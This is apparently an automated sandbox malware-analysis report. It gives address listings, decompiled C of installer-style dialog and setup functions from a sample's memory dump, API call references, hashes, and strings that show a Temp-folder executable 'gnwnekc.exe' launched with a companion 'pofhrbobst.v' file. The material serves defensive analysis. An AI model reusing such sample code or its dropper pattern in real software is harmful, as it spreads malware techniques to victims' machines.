0x004074be
0x004074be
0x004074be
0x004074c1
0x004074c4
0x004074c4
0x004074c4
0x004074c4
0x004074c7
0x004074c7
0x004074cb
0x0040752b
0x0040752e
0x00407533
0x00407534
0x00407536
0x00407538
0x0040753b
0x00000000
0x0040753b
0x004074cd
0x004074d3
0x004074d6
0x004074d9
0x004074dc
0x004074df
0x004074e2
0x004074e5
0x004074e8
0x004074eb
0x004074ee
0x00407507
0x0040750a
0x0040750d
0x00407510
0x00407514
0x00407516
0x00407516
0x00407517
0x0040751a
0x004074f0
0x004074f0
0x004074f8
0x004074fd
0x004074ff
0x00407502
0x00407502
0x0040751d
0x00407524
0x00000000
0x00407526
0x00000000
0x00407526
0x00000000
0x004071c2
0x004071c5
0x004071fb
0x0040732b
0x0040732b
0x0040732b
0x0040732b
0x0040732e
0x0040732e
0x00407331
0x00407333
0x004075bd
0x00000000
0x004075bd
0x00407339
0x0040733c
0x00000000
0x00000000
0x00407342
0x00407346
0x00407349
0x00407349
0x00407349
0x00000000
0x00407349
0x004071c7
0x004071c9
0x004071cb
0x004071cd
0x004071d0
0x004071d1
0x004071d3
0x004071d5
0x004071d8
0x004071db
0x004071f1
0x004071f6
0x0040722e
0x0040722e
0x00407232
0x0040725e
0x00407260
0x00407267
0x0040726a
0x0040726d
0x0040726d
0x00407272
0x00407272
0x00407274
0x00407277
0x0040727e
0x00407281
0x004072ae
0x004072ae
0x004072b1
0x004072b4
0x00407328
0x00407328
0x00407328
0x00000000
0x00407328
0x004072b6
0x004072bc
0x004072bf
0x004072c2
0x004072c5
0x004072c8
0x004072cb
0x004072ce
0x004072d1
0x004072d4
0x004072d7
0x004072f0
0x004072f2
0x004072f5
0x004072f6
0x004072f9
0x004072fb
0x004072fe
0x00407300
0x00407302
0x00407305
0x00407307
0x0040730a
0x0040730e
0x00407310
0x00407310
0x00407311
0x00407314
0x00407317
0x004072d9
0x004072d9
0x004072e1
0x004072e6
0x004072e8
0x004072eb
0x004072eb
0x0040731a
0x00407321
0x004072ab
0x004072ab
0x004072ab
0x004072ab
0x00000000
0x00407323
0x00000000
0x00407323
0x00407321
0x00407234
0x00407237
0x00407239
0x0040723c
0x0040723f
0x00407242
0x00407244
0x00407247
0x0040724a
0x0040724a
0x0040724d
0x0040724d
0x00407250
0x00407257
0x0040722b
0x0040722b
0x0040722b
0x0040722b
0x00000000
0x00407259
0x00000000
0x00407259
0x00407257
0x004071dd
0x004071e0
0x004071e2
0x004071e5
0x00000000
0x00000000
0x00000000
0x00000000
0x004070cf
0x004070cf
0x004070d3
0x00407599
0x00000000
0x00407599
0x004070d9
0x004070dc
0x004070df
0x004070e2
0x004070e4
0x004070e4
0x004070e4
0x004070e7
0x004070ea
0x004070ed
0x004070f0
0x004070f3
0x004070f6
0x004070f7
0x004070f9
0x004070f9
0x004070f9
0x004070fc
0x004070ff
0x00407102
0x00407105
0x00407105
0x00407105
0x00407108
0x00000000
0x00000000
0x0040734c
0x0040734c
0x0040734c
0x00407350
0x00000000
0x00000000
0x00407356
0x00407359
0x0040735c
0x0040735f
0x00407361
0x00407361
0x00407361
0x00407364
0x00407367
0x0040736a
0x0040736d
0x00407370
0x00407373
0x00407374
0x00407376
0x00407376
0x00407376
0x00407379
0x0040737c
0x0040737f
0x00407382
0x00407385
0x00407389
0x0040738b
0x0040738e
0x00000000
0x00407390
0x00000000
0x00407390
0x0040738e
0x004075c3
0x00000000
0x00000000
0x00406bf2

Memory Dump Source

Source File: 00000005.00000002.921283190.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.921277923.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921291150.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921295812.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921300793.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921316277.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921324458.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921331757.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921337958.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_word.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ae840c17bc4cb012e3c6e2f9739eb08ea49decd14d2b7f73774d31e5ba5825a
Instruction ID: 02c1e40b0c9780dd067322b7733c474732bd0f187a49f53fd7fd3c108ee94619
Opcode Fuzzy Hash: 6ae840c17bc4cb012e3c6e2f9739eb08ea49decd14d2b7f73774d31e5ba5825a
Instruction Fuzzy Hash: 7CF15570D04229CBDF28CFA8C8946ADBBB0FF44305F24816ED456BB281D7386A86DF45

Uniqueness

Uniqueness Score: -1.00%

Function 0040699E Relevance: 3.0, APIs: 2, Instructions: 14
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040699E(WCHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileW(_a4, 0x426798); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x426798;
			}

0x004069a9
0x004069b2
0x00000000
0x004069bf
0x004069b5
0x00000000

APIs

FindFirstFileW.KERNELBASE(7556D4C4,00426798,00425F50,00406088,00425F50,00425F50,00000000,00425F50,00425F50,7556D4C4,?,755513E0,00405D94,?,7556D4C4,755513E0), ref: 004069A9
FindClose.KERNEL32(00000000), ref: 004069B5

Memory Dump Source

Source File: 00000005.00000002.921283190.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.921277923.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921291150.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921295812.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921300793.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921316277.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921324458.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921331757.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921337958.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_word.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 1093b80bdde5f117a2aeaff90f04fc035896fcf98737a4a628a8a679d5dfa397
Instruction ID: 0ca7534fdffec89160a31ceabb6ef5ff718bfc83d1618d69d17f9e635378cbc3
Opcode Fuzzy Hash: 1093b80bdde5f117a2aeaff90f04fc035896fcf98737a4a628a8a679d5dfa397
Instruction Fuzzy Hash: 5ED012B15192205FC34057387E0C84B7A989F563317268A36B4AAF11E0CB348C3297AC

Uniqueness

Uniqueness Score: -1.00%

Function 004040C5 Relevance: 61.6, APIs: 34, Strings: 1, Instructions: 357
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 84%

			E004040C5(struct HWND__* _a4, intOrPtr _a8, int _a12, long _a16) {
				struct HWND__* _v28;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t34;
				signed int _t36;
				signed int _t38;
				struct HWND__* _t48;
				signed int _t67;
				struct HWND__* _t73;
				signed int _t86;
				struct HWND__* _t91;
				signed int _t99;
				int _t103;
				signed int _t117;
				int _t118;
				int _t122;
				signed int _t124;
				struct HWND__* _t127;
				struct HWND__* _t128;
				int _t129;
				intOrPtr _t130;
				long _t133;
				int _t135;
				int _t136;
				void* _t137;
				void* _t145;

				_t130 = _a8;
				if(_t130 == 0x110 || _t130 == 0x408) {
					_t34 = _a12;
					_t127 = _a4;
					__eflags = _t130 - 0x110;
					 *0x423730 = _t34;
					if(_t130 == 0x110) {
						 *0x42a268 = _t127;
						 *0x423744 = GetDlgItem(_t127, 1);
						_t91 = GetDlgItem(_t127, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x421710 = _t91;
						E004045C4(_t127);
						SetClassLongW(_t127, 0xfffffff2,  *0x429248);
						 *0x42922c = E0040140B(4);
						_t34 = 1;
						__eflags = 1;
						 *0x423730 = 1;
					}
					_t124 =  *0x40a39c; // 0x0
					_t136 = 0;
					_t133 = (_t124 << 6) +  *0x42a280;
					__eflags = _t124;
					if(_t124 < 0) {
						L36:
						E00404610(0x40b);
						while(1) {
							_t36 =  *0x423730;
							 *0x40a39c =  *0x40a39c + _t36;
							_t133 = _t133 + (_t36 << 6);
							_t38 =  *0x40a39c; // 0x0
							__eflags = _t38 -  *0x42a284;
							if(_t38 ==  *0x42a284) {
								E0040140B(1);
							}
							__eflags =  *0x42922c - _t136;
							if( *0x42922c != _t136) {
								break;
							}
							__eflags =  *0x40a39c -  *0x42a284; // 0x0
							if(__eflags >= 0) {
								break;
							}
							_t117 =  *(_t133 + 0x14);
							E004066A5(_t117, _t127, _t133, 0x43a000,  *((intOrPtr*)(_t133 + 0x24)));
							_push( *((intOrPtr*)(_t133 + 0x20)));
							_push(0xfffffc19);
							E004045C4(_t127);
							_push( *((intOrPtr*)(_t133 + 0x1c)));
							_push(0xfffffc1b);
							E004045C4(_t127);
							_push( *((intOrPtr*)(_t133 + 0x28)));
							_push(0xfffffc1a);
							E004045C4(_t127);
							_t48 = GetDlgItem(_t127, 3);
							__eflags =  *0x42a2ec - _t136;
							_v28 = _t48;
							if( *0x42a2ec != _t136) {
								_t117 = _t117 & 0x0000fefd | 0x00000004;
								__eflags = _t117;
							}
							ShowWindow(_t48, _t117 & 0x00000008);
							EnableWindow( *(_t137 + 0x34), _t117 & 0x00000100);
							E004045E6(_t117 & 0x00000002);
							_t118 = _t117 & 0x00000004;
							EnableWindow( *0x421710, _t118);
							__eflags = _t118 - _t136;
							if(_t118 == _t136) {
								_push(1);
							} else {
								_push(_t136);
							}
							EnableMenuItem(GetSystemMenu(_t127, _t136), 0xf060, ??);
							SendMessageW( *(_t137 + 0x3c), 0xf4, _t136, 1);
							__eflags =  *0x42a2ec - _t136;
							if( *0x42a2ec == _t136) {
								_push( *0x423744);
							} else {
								SendMessageW(_t127, 0x401, 2, _t136);
								_push( *0x421710);
							}
							E004045F9();
							E00406668(0x423748, E004040A6());
							E004066A5(0x423748, _t127, _t133,  &(0x423748[lstrlenW(0x423748)]),  *((intOrPtr*)(_t133 + 0x18)));
							SetWindowTextW(_t127, 0x423748);
							_push(_t136);
							_t67 = E00401389( *((intOrPtr*)(_t133 + 8)));
							__eflags = _t67;
							if(_t67 != 0) {
								continue;
							} else {
								__eflags =  *_t133 - _t136;
								if( *_t133 == _t136) {
									continue;
								}
								__eflags =  *(_t133 + 4) - 5;
								if( *(_t133 + 4) != 5) {
									DestroyWindow( *0x429238);
									 *0x422720 = _t133;
									__eflags =  *_t133 - _t136;
									if( *_t133 <= _t136) {
										goto L60;
									}
									_t73 = CreateDialogParamW( *0x42a260,  *_t133 +  *0x429240 & 0x0000ffff, _t127,  *(0x40a3a0 +  *(_t133 + 4) * 4), _t133);
									__eflags = _t73 - _t136;
									 *0x429238 = _t73;
									if(_t73 == _t136) {
										goto L60;
									}
									_push( *((intOrPtr*)(_t133 + 0x2c)));
									_push(6);
									E004045C4(_t73);
									GetWindowRect(GetDlgItem(_t127, 0x3fa), _t137 + 0x10);
									ScreenToClient(_t127, _t137 + 0x10);
									SetWindowPos( *0x429238, _t136,  *(_t137 + 0x20),  *(_t137 + 0x20), _t136, _t136, 0x15);
									_push(_t136);
									E00401389( *((intOrPtr*)(_t133 + 0xc)));
									__eflags =  *0x42922c - _t136;
									if( *0x42922c != _t136) {
										goto L63;
									}
									ShowWindow( *0x429238, 8);
									E00404610(0x405);
									goto L60;
								}
								__eflags =  *0x42a2ec - _t136;
								if( *0x42a2ec != _t136) {
									goto L63;
								}
								__eflags =  *0x42a2e0 - _t136;
								if( *0x42a2e0 != _t136) {
									continue;
								}
								goto L63;
							}
						}
						DestroyWindow( *0x429238); // executed
						 *0x42a268 = _t136;
						EndDialog(_t127,  *0x421f18);
						goto L60;
					} else {
						__eflags = _t34 - 1;
						if(_t34 != 1) {
							L35:
							__eflags =  *_t133 - _t136;
							if( *_t133 == _t136) {
								goto L63;
							}
							goto L36;
						}
						_push(0);
						_t86 = E00401389( *((intOrPtr*)(_t133 + 0x10)));
						__eflags = _t86;
						if(_t86 == 0) {
							goto L35;
						}
						SendMessageW( *0x429238, 0x40f, 0, 1);
						__eflags =  *0x42922c;
						return 0 |  *0x42922c == 0x00000000;
					}
				} else {
					_t127 = _a4;
					_t136 = 0;
					if(_t130 == 0x47) {
						SetWindowPos( *0x423728, _t127, 0, 0, 0, 0, 0x13);
					}
					_t122 = _a12;
					if(_t130 != 5) {
						L8:
						if(_t130 != 0x40d) {
							__eflags = _t130 - 0x11;
							if(_t130 != 0x11) {
								__eflags = _t130 - 0x111;
								if(_t130 != 0x111) {
									goto L28;
								}
								_t135 = _t122 & 0x0000ffff;
								_t128 = GetDlgItem(_t127, _t135);
								__eflags = _t128 - _t136;
								if(_t128 == _t136) {
									L15:
									__eflags = _t135 - 1;
									if(_t135 != 1) {
										__eflags = _t135 - 3;
										if(_t135 != 3) {
											_t129 = 2;
											__eflags = _t135 - _t129;
											if(_t135 != _t129) {
												L27:
												SendMessageW( *0x429238, 0x111, _t122, _a16);
												goto L28;
											}
											__eflags =  *0x42a2ec - _t136;
											if( *0x42a2ec == _t136) {
												_t99 = E0040140B(3);
												__eflags = _t99;
												if(_t99 != 0) {
													goto L28;
												}
												 *0x421f18 = 1;
												L23:
												_push(0x78);
												L24:
												E0040459D();
												goto L28;
											}
											E0040140B(_t129);
											 *0x421f18 = _t129;
											goto L23;
										}
										__eflags =  *0x40a39c - _t136; // 0x0
										if(__eflags <= 0) {
											goto L27;
										}
										_push(0xffffffff);
										goto L24;
									}
									_push(_t135);
									goto L24;
								}
								SendMessageW(_t128, 0xf3, _t136, _t136);
								_t103 = IsWindowEnabled(_t128);
								__eflags = _t103;
								if(_t103 == 0) {
									L63:
									return 0;
								}
								goto L15;
							}
							SetWindowLongW(_t127, _t136, _t136);
							return 1;
						}
						DestroyWindow( *0x429238);
						 *0x429238 = _t122;
						L60:
						_t145 =  *0x425748 - _t136; // 0x0
						if(_t145 == 0 &&  *0x429238 != _t136) {
							ShowWindow(_t127, 0xa);
							 *0x425748 = 1;
						}
						goto L63;
					} else {
						asm("sbb eax, eax");
						ShowWindow( *0x423728,  ~(_t122 - 1) & 0x00000005);
						if(_t122 != 2 || (GetWindowLongW(_t127, 0xfffffff0) & 0x21010000) != 0x1000000) {
							L28:
							return E0040462B(_a8, _t122, _a16);
						} else {
							ShowWindow(_t127, 4);
							goto L8;
						}
					}
				}
			}

0x004040d0
0x004040d7
0x0040423e
0x00404242
0x00404246
0x00404248
0x0040424d
0x00404258
0x00404263
0x00404268
0x0040426a
0x0040426c
0x0040426f
0x00404274
0x00404282
0x0040428f
0x00404296
0x00404296
0x00404297
0x00404297
0x0040429c
0x004042a2
0x004042a9
0x004042af
0x004042b1
0x004042f1
0x004042f6
0x004042fb
0x004042fb
0x00404300
0x00404309
0x0040430b
0x00404310
0x00404316
0x0040431a
0x0040431a
0x0040431f
0x00404325
0x00000000
0x00000000
0x00404330
0x00404336
0x00000000
0x00000000
0x0040433f
0x00404347
0x0040434c
0x0040434f
0x00404355
0x0040435a
0x0040435d
0x00404363
0x00404368
0x0040436b
0x00404371
0x00404379
0x0040437f
0x00404385
0x00404389
0x00404390
0x00404390
0x00404390
0x0040439a
0x004043ac
0x004043b8
0x004043bd
0x004043c7
0x004043cd
0x004043cf
0x004043d4
0x004043d1
0x004043d1
0x004043d1
0x004043e4
0x004043fc
0x004043fe
0x00404404
0x00404419
0x00404406
0x0040440f
0x00404411
0x00404411
0x0040441f
0x00404430
0x00404446
0x0040444d
0x00404453
0x00404457
0x0040445c
0x0040445e
0x00000000
0x00404464
0x00404464
0x00404466
0x00000000
0x00000000
0x0040446c
0x00404470
0x00404495
0x0040449b
0x004044a1
0x004044a3
0x00000000
0x00000000
0x004044c9
0x004044cf
0x004044d1
0x004044d6
0x00000000
0x00000000
0x004044dc
0x004044df
0x004044e2
0x004044f9
0x00404505
0x0040451e
0x00404524
0x00404528
0x0040452d
0x00404533
0x00000000
0x00000000
0x0040453d
0x00404548
0x00000000
0x00404548
0x00404472
0x00404478
0x00000000
0x00000000
0x0040447e
0x00404484
0x00000000
0x00000000
0x00000000
0x0040448a
0x0040445e
0x00404555
0x00404561
0x00404568
0x00000000
0x004042b3
0x004042b3
0x004042b6
0x004042e9
0x004042e9
0x004042eb
0x00000000
0x00000000
0x00000000
0x004042eb
0x004042b8
0x004042bc
0x004042c1
0x004042c3
0x00000000
0x00000000
0x004042d3
0x004042db
0x00000000
0x004042e1
0x004040e9
0x004040e9
0x004040ed
0x004040f2
0x00404101
0x00404101
0x00404107
0x0040410e
0x00404152
0x00404158
0x00404171
0x00404174
0x00404187
0x0040418d
0x00000000
0x00000000
0x00404193
0x0040419e
0x004041a0
0x004041a2
0x004041c1
0x004041c1
0x004041c4
0x004041c9
0x004041cc
0x004041dc
0x004041dd
0x004041df
0x00404215
0x00404225
0x00000000
0x00404225
0x004041e1
0x004041e7
0x00404200
0x00404205
0x00404207
0x00000000
0x00000000
0x00404209
0x004041f5
0x004041f5
0x004041f7
0x004041f7
0x00000000
0x004041f7
0x004041ea
0x004041ef
0x00000000
0x004041ef
0x004041ce
0x004041d4
0x00000000
0x00000000
0x004041d6
0x00000000
0x004041d6
0x004041c6
0x00000000
0x004041c6
0x004041ac
0x004041b3
0x004041b9
0x004041bb
0x00404591
0x00000000
0x00404591
0x00000000
0x004041bb
0x00404179
0x00000000
0x00404181
0x00404160
0x00404166
0x0040456e
0x0040456e
0x00404574
0x00404581
0x00404587
0x00404587
0x00000000
0x00404110
0x00404115
0x00404121
0x0040412a
0x0040422b
0x00000000
0x00404149
0x0040414c
0x00000000
0x0040414c
0x0040412a
0x0040410e

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00404101
ShowWindow.USER32(?), ref: 00404121
GetWindowLongW.USER32(?,000000F0), ref: 00404133
ShowWindow.USER32(?,00000004), ref: 0040414C
DestroyWindow.USER32 ref: 00404160
SetWindowLongW.USER32 ref: 00404179
GetDlgItem.USER32(?,?), ref: 00404198
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 004041AC
IsWindowEnabled.USER32(00000000), ref: 004041B3
GetDlgItem.USER32(?,00000001), ref: 0040425E
GetDlgItem.USER32(?,00000002), ref: 00404268
SetClassLongW.USER32(?,000000F2,?), ref: 00404282
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004042D3
GetDlgItem.USER32(?,00000003), ref: 00404379
ShowWindow.USER32(00000000,?), ref: 0040439A
EnableWindow.USER32(?,?), ref: 004043AC
EnableWindow.USER32(?,?), ref: 004043C7
GetSystemMenu.USER32 ref: 004043DD
EnableMenuItem.USER32 ref: 004043E4
SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004043FC
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040440F
lstrlenW.KERNEL32(00423748,?,00423748,00000000), ref: 00404439
SetWindowTextW.USER32 ref: 0040444D
ShowWindow.USER32(?,0000000A), ref: 00404581

Strings

H7B, xrefs: 00404429

Memory Dump Source

Source File: 00000005.00000002.921283190.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.921277923.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921291150.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921295812.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921300793.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921316277.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921324458.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921331757.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921337958.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_word.jbxd

Similarity

API ID: Window$Item$MessageSendShow$EnableLong$Menu$ClassDestroyEnabledSystemTextlstrlen
String ID: H7B
API String ID: 1860320154-2300413410
Opcode ID: b499a380baa1669b9d39d87f51061d2fd0c3acf201e93ffa24678bb3f42416dd
Instruction ID: 1d4a55fced449df2e2a9dfc159c1061f424388fbea236c5341ec002980a30b6c
Opcode Fuzzy Hash: b499a380baa1669b9d39d87f51061d2fd0c3acf201e93ffa24678bb3f42416dd
Instruction Fuzzy Hash: C0C1C2B1600604FBDB216F61EE85E2A3B78EB85745F40097EF781B51F0CB3958529B2E

Uniqueness

Uniqueness Score: -1.00%

Function 00403D17 Relevance: 44.0, APIs: 13, Strings: 12, Instructions: 215
stringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E00403D17(void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				void _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t22;
				void* _t30;
				void* _t32;
				int _t33;
				void* _t36;
				int _t39;
				int _t40;
				int _t44;
				short _t63;
				WCHAR* _t65;
				signed char _t69;
				WCHAR* _t76;
				intOrPtr _t82;
				WCHAR* _t87;

				_t82 =  *0x42a270;
				_t22 = E00406A35(2);
				_t90 = _t22;
				if(_t22 == 0) {
					_t76 = 0x423748;
					L"1033" = 0x30;
					 *0x437002 = 0x78;
					 *0x437004 = 0;
					E00406536(_t78, __eflags, 0x80000001, L"Control Panel\\Desktop\\ResourceLocale", 0, 0x423748, 0);
					__eflags =  *0x423748;
					if(__eflags == 0) {
						E00406536(_t78, __eflags, 0x80000003, L".DEFAULT\\Control Panel\\International",  &M004083D4, 0x423748, 0);
					}
					lstrcatW(L"1033", _t76);
				} else {
					E004065AF(L"1033",  *_t22() & 0x0000ffff);
				}
				E00403FED(_t78, _t90);
				 *0x42a2e0 =  *0x42a278 & 0x00000020;
				 *0x42a2fc = 0x10000;
				if(E0040603F(_t90, 0x435800) != 0) {
					L16:
					if(E0040603F(_t98, 0x435800) == 0) {
						E004066A5(_t76, 0, _t82, 0x435800,  *((intOrPtr*)(_t82 + 0x118)));
					}
					_t30 = LoadImageW( *0x42a260, 0x67, 1, 0, 0, 0x8040);
					 *0x429248 = _t30;
					if( *((intOrPtr*)(_t82 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t32 = E00403FED(_t78, __eflags);
							__eflags =  *0x42a300;
							if( *0x42a300 != 0) {
								_t33 = E0040579D(_t32, 0);
								__eflags = _t33;
								if(_t33 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x42922c;
								if( *0x42922c == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x423728, 5); // executed
							_t39 = E004069C5("RichEd20"); // executed
							__eflags = _t39;
							if(_t39 == 0) {
								E004069C5("RichEd32");
							}
							_t87 = L"RichEdit20W";
							_t40 = GetClassInfoW(0, _t87, 0x429200);
							__eflags = _t40;
							if(_t40 == 0) {
								GetClassInfoW(0, L"RichEdit", 0x429200);
								 *0x429224 = _t87;
								RegisterClassW(0x429200);
							}
							_t44 = DialogBoxParamW( *0x42a260,  *0x429240 + 0x00000069 & 0x0000ffff, 0, E004040C5, 0); // executed
							E00403C67(E0040140B(5), 1);
							return _t44;
						}
						L22:
						_t36 = 2;
						return _t36;
					} else {
						_t78 =  *0x42a260;
						 *0x429204 = E00401000;
						 *0x429210 =  *0x42a260;
						 *0x429214 = _t30;
						 *0x429224 = 0x40a3b4;
						if(RegisterClassW(0x429200) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						SystemParametersInfoW(0x30, 0,  &_v16, 0);
						 *0x423728 = CreateWindowExW(0x80, 0x40a3b4, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x42a260, 0);
						goto L21;
					}
				} else {
					_t78 =  *(_t82 + 0x48);
					_t92 = _t78;
					if(_t78 == 0) {
						goto L16;
					}
					_t76 = 0x428200;
					E00406536(_t78, _t92,  *((intOrPtr*)(_t82 + 0x44)),  *0x42a298 + _t78 * 2,  *0x42a298 +  *(_t82 + 0x4c) * 2, 0x428200, 0);
					_t63 =  *0x428200; // 0x22
					if(_t63 == 0) {
						goto L16;
					}
					if(_t63 == 0x22) {
						_t76 = 0x428202;
						 *((short*)(E00405F64(0x428202, 0x22))) = 0;
					}
					_t65 = _t76 + lstrlenW(_t76) * 2 - 8;
					if(_t65 <= _t76 || lstrcmpiW(_t65, L".exe") != 0) {
						L15:
						E00406668(0x435800, E00405F37(_t76));
						goto L16;
					} else {
						_t69 = GetFileAttributesW(_t76);
						if(_t69 == 0xffffffff) {
							L14:
							E00405F83(_t76);
							goto L15;
						}
						_t98 = _t69 & 0x00000010;
						if((_t69 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}

0x00403d1d
0x00403d26
0x00403d2d
0x00403d2f
0x00403d43
0x00403d55
0x00403d5e
0x00403d67
0x00403d6e
0x00403d73
0x00403d7a
0x00403d8d
0x00403d8d
0x00403d98
0x00403d31
0x00403d3c
0x00403d3c
0x00403d9d
0x00403db0
0x00403db5
0x00403dc6
0x00403e58
0x00403e60
0x00403e69
0x00403e69
0x00403e7f
0x00403e85
0x00403e93
0x00403f14
0x00403f1c
0x00403f26
0x00403f2b
0x00403f31
0x00403fbb
0x00403fc0
0x00403fc2
0x00403fde
0x00000000
0x00403fde
0x00403fc4
0x00403fca
0x00403fd2
0x00403fd2
0x00000000
0x00403fca
0x00403f3f
0x00403f4a
0x00403f4f
0x00403f51
0x00403f58
0x00403f58
0x00403f63
0x00403f6b
0x00403f6d
0x00403f6f
0x00403f78
0x00403f7b
0x00403f81
0x00403f81
0x00403fa0
0x00403fb1
0x00000000
0x00403fb6
0x00403f1e
0x00403f20
0x00000000
0x00403e95
0x00403e95
0x00403ea1
0x00403eab
0x00403eb1
0x00403eb6
0x00403ec5
0x00403fe3
0x00403fe3
0x00000000
0x00403fe3
0x00403ed4
0x00403f0f
0x00000000
0x00403f0f
0x00403dcc
0x00403dcc
0x00403dcf
0x00403dd1
0x00000000
0x00000000
0x00403ddf
0x00403df1
0x00403df6
0x00403dff
0x00000000
0x00000000
0x00403e05
0x00403e07
0x00403e14
0x00403e14
0x00403e1d
0x00403e23
0x00403e4b
0x00403e53
0x00000000
0x00403e35
0x00403e36
0x00403e3f
0x00403e45
0x00403e46
0x00000000
0x00403e46
0x00403e41
0x00403e43
0x00000000
0x00000000
0x00000000
0x00403e43
0x00403e23

APIs

Part of subcall function 00406A35: GetModuleHandleA.KERNEL32(?,00000020,?,00403750,0000000B), ref: 00406A47
Part of subcall function 00406A35: GetProcAddress.KERNEL32(00000000,?), ref: 00406A62

lstrcatW.KERNEL32 ref: 00403D98
lstrlenW.KERNEL32("C:\Users\user\AppData\Local\Temp\gnwnekc.exe" C:\Users\user\AppData\Local\Temp\pofhrbobst.v,?,?,?,"C:\Users\user\AppData\Local\Temp\gnwnekc.exe" C:\Users\user\AppData\Local\Temp\pofhrbobst.v,00000000,00435800,1033,00423748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423748,00000000,00000002,7556D4C4), ref: 00403E18
lstrcmpiW.KERNEL32(?,.exe,"C:\Users\user\AppData\Local\Temp\gnwnekc.exe" C:\Users\user\AppData\Local\Temp\pofhrbobst.v,?,?,?,"C:\Users\user\AppData\Local\Temp\gnwnekc.exe" C:\Users\user\AppData\Local\Temp\pofhrbobst.v,00000000,00435800,1033,00423748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423748,00000000), ref: 00403E2B
GetFileAttributesW.KERNEL32("C:\Users\user\AppData\Local\Temp\gnwnekc.exe" C:\Users\user\AppData\Local\Temp\pofhrbobst.v,?,00000000,?), ref: 00403E36
LoadImageW.USER32 ref: 00403E7F

Part of subcall function 004065AF: wsprintfW.USER32 ref: 004065BC

RegisterClassW.USER32 ref: 00403EBC
SystemParametersInfoW.USER32 ref: 00403ED4
CreateWindowExW.USER32 ref: 00403F09
ShowWindow.USER32(00000005,00000000), ref: 00403F3F
GetClassInfoW.USER32 ref: 00403F6B
GetClassInfoW.USER32 ref: 00403F78
RegisterClassW.USER32 ref: 00403F81
DialogBoxParamW.USER32 ref: 00403FA0

Strings

Control Panel\Desktop\ResourceLocale, xrefs: 00403D4B
RichEdit, xrefs: 00403F72
H7B, xrefs: 00403D43
1033, xrefs: 00403D37, 00403D93
RichEd20, xrefs: 00403F45
_Nb, xrefs: 00403E9B, 00403F03
"C:\Users\user\AppData\Local\Temp\gnwnekc.exe" C:\Users\user\AppData\Local\Temp\pofhrbobst.v, xrefs: 00403DDF, 00403DE8, 00403DF6, 00403E45, 00403E4B
RichEdit20W, xrefs: 00403F63, 00403F69
.exe, xrefs: 00403E25
C:\Users\user\AppData\Local\Temp\, xrefs: 00403D1C
RichEd32, xrefs: 00403F53
